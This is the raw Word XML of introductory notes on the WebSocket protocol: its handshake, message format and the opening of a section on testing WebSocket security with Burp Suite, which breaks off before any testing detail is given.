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F273" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12960">
        <w:t xml:space="preserve">What are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12960">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D12960">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB6DDE7" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0002318A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0002318A">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0002318A">
        <w:t xml:space="preserve"> are a bi-directional, full duplex communications protocol initiated over HTTP. They are commonly used in modern web applications for streaming data and other asynchronous traffic. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B9C44" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0002318A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="0002318A">
        <w:t xml:space="preserve">In this section, we'll explain the difference between HTTP and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0002318A">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0002318A">
        <w:t xml:space="preserve">, describe how WebSocket connections are established, and outline what WebSocket messages look like. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0356C322" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="000A6FF7" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="000A6FF7">
        <w:t xml:space="preserve">What is the difference between HTTP and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A6FF7">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A6FF7">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3288AE71" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="000A6FF7" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="000A6FF7">
        <w:t xml:space="preserve">Most communication between web browsers and web sites uses HTTP. With HTTP, the client sends a request and the server returns a response. Typically, the response occurs immediately, and the transaction is complete. Even if the network connection stays open, this will be used for a separate transaction of a request and a response. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4098FCA4" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="000A6FF7" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="000A6FF7">
        <w:t xml:space="preserve">Some modern web sites use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A6FF7">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A6FF7">
        <w:t xml:space="preserve">. WebSocket connections are initiated over HTTP and are typically long-lived. Messages can be sent in either direction at any time and are not transactional in nature. The connection will normally stay open and idle until either the client or the server is ready to send a message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48210661" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="000A6FF7" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A6FF7">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A6FF7">
        <w:t xml:space="preserve"> are particularly useful in situations where low-latency or server-initiated messages are required, such as real-time feeds of financial data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FE992C" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003E2E37" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="003E2E37">
        <w:t>How are WebSocket connections established?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0346EFF9" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003E2E37" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="003E2E37">
        <w:t xml:space="preserve">WebSocket connections are normally created using client-side JavaScript like the following: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5370E5C5" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003E2E37" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="003E2E37">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E2E37">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E2E37">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> = new WebSocket("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E2E37">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>wss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E2E37">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>://normal-website.com/chat");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2B86E5" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003E2E37" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E2E37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E2BEE1" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003E2E37" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="003E2E37">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E2E37">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>wss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E2E37">
        <w:t xml:space="preserve"> protocol establishes a WebSocket over an encrypted TLS connection, while the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E2E37">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E2E37">
        <w:t xml:space="preserve"> protocol uses an unencrypted connection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC1A6B7" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FC5672" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00FC5672">
        <w:t xml:space="preserve">To establish the connection, the browser and server perform a WebSocket handshake over HTTP. The browser issues a WebSocket handshake request like the following: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42258064" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FC5672" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00FC5672">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /chat HTTP/1.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF482F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC5672">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: normal-website.com </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF482F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC5672">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Sec-WebSocket-Version: 13 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF482F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC5672">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w== </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF482F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC5672">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection: keep-alive, Upgrade </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF482F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC5672">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF482F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC5672">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC5672">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>websocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33BB41DD" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FC5672" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00FC5672">
        <w:t xml:space="preserve">If the server accepts the connection, it returns a WebSocket handshake response like the following: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DA8457" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FC5672" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00FC5672">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/1.1 101 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF482F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC5672">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Switching Protocols Connection: Upgrade </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF482F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC5672">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Upgrade</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC5672">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC5672">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>websocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC5672">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF482F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC5672">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2713DB45" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00FC5672">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">At this point, the network connection remains open and can be used to send WebSocket messages in either direction. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCF9B7E" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="009268D9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009268D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8CF7CF" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="009268D9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="009268D9">
        <w:t xml:space="preserve">Several features of the WebSocket handshake messages are worth noting: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0B7B2B" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="009268D9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009268D9">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="009268D9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Connection</w:t>
      </w:r>
      <w:r w:rsidRPr="009268D9">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="009268D9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Upgrade</w:t>
      </w:r>
      <w:r w:rsidRPr="009268D9">
        <w:t xml:space="preserve"> headers in the request and response indicate that this is a WebSocket handshake. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C80F897" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="009268D9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009268D9">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="009268D9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Sec-WebSocket-Version</w:t>
      </w:r>
      <w:r w:rsidRPr="009268D9">
        <w:t xml:space="preserve"> request header specifies the WebSocket protocol version that the client wishes to use. This is typically </w:t>
      </w:r>
      <w:r w:rsidRPr="009268D9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="009268D9">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACD75C5" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="009268D9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009268D9">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="009268D9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Sec-WebSocket-Key</w:t>
      </w:r>
      <w:r w:rsidRPr="009268D9">
        <w:t xml:space="preserve"> request header contains a Base64-encoded random value, which should be randomly generated in each handshake request. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672BFA41" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="009268D9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009268D9">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="009268D9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Sec-WebSocket-Accept</w:t>
      </w:r>
      <w:r w:rsidRPr="009268D9">
        <w:t xml:space="preserve"> response header contains a hash of the value submitted in the </w:t>
      </w:r>
      <w:r w:rsidRPr="009268D9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Sec-WebSocket-Key</w:t>
      </w:r>
      <w:r w:rsidRPr="009268D9">
        <w:t xml:space="preserve"> request header, concatenated with a specific string defined in the protocol specification. This is done to prevent misleading responses resulting from misconfigured servers or caching proxies. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2C7AD7" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="4E713ACF" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0013672A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="0013672A">
        <w:t>What do WebSocket messages look like?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E9F395" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0013672A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="0013672A">
        <w:t xml:space="preserve">Once a WebSocket connection has been established, messages can be sent asynchronously in either direction by the client or server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723299E8" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0013672A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="0013672A">
        <w:t xml:space="preserve">A simple message could be sent from the browser using client-side JavaScript like the following: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A474003" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0013672A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013672A">
        <w:t>ws.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013672A">
        <w:t>("Peter Wiener");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6F67C4" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0013672A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="0013672A">
        <w:t xml:space="preserve">In principle, WebSocket messages can contain any content or data format. In modern applications, it is common for JSON to be used to send structured data within WebSocket messages. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEC9847" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0013672A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="0013672A">
        <w:t xml:space="preserve">For example, a chat-bot application using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013672A">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013672A">
        <w:t xml:space="preserve"> might send a message like the following: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359ABFF9" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00D94E58">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D94E58">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>user":"Hal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D94E58">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D94E58">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Pline","content":"I</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D94E58">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> wanted to be a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D94E58">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Playstation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D94E58">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> growing up, not a device to answer your inane questions"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC387AE" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="4438D7FB" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="007E0756">
        <w:t xml:space="preserve">Testing for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E0756">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E0756">
        <w:t xml:space="preserve"> security vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C293BF" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="008B7FEB">
        <w:t xml:space="preserve">In this section, we'll explain how to manipulate WebSocket messages and connections, describe the kinds of security vulnerabilities that can arise with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B7FEB">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B7FEB">
        <w:t xml:space="preserve">, and give some examples of exploiting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B7FEB">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B7FEB">
        <w:t xml:space="preserve"> vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAADEE0" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00CC2AAA" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2AAA">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38352512" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00CC2AAA" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2AAA">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2AAA">
        <w:t xml:space="preserve"> are widely used in modern web applications. They are initiated over HTTP and provide long-lived connections with asynchronous communication in both directions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DBFA61" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2AAA">
        <w:lastRenderedPageBreak/>
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2AAA">
        <w:t xml:space="preserve"> are used for all kinds of purposes, including performing user actions and transmitting sensitive information. Virtually any web security vulnerability that arises with regular HTTP can also arise in relation to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2AAA">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2AAA">
        <w:t xml:space="preserve"> communications. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37214916" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00576144">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40CC57FE" wp14:editId="7A588DE1">
            <wp:extent cx="5731510" cy="3229610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="139356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67106" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3229610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FD8F69" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00AF061C" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF061C">
        <w:t>Manipulating WebSocket traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24736E63" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00AF061C" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00AF061C">
        <w:t xml:space="preserve">Finding </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF061C">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF061C">
        <w:t xml:space="preserve"> security vulnerabilities generally involves manipulating them in ways that the application doesn't expect. You can do this using Burp Suite. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5E8B20" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00AF061C" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00AF061C">
        <w:t xml:space="preserve">You can use Burp Suite to: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750C4F8B" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FB2E03" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2E03">
        <w:t>Intercepting and modifying WebSocket messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745490B0" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FB2E03" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2E03">
        <w:t>Replaying and generating new WebSocket messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3FA041" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2E03">
        <w:t>Manipulating WebSocket connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F3C23F" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="5C6F9C43" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00D41B1D" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00D41B1D">
        <w:t>Intercepting and modifying WebSocket messages</w:t>
      </w:r>
    </w:p>
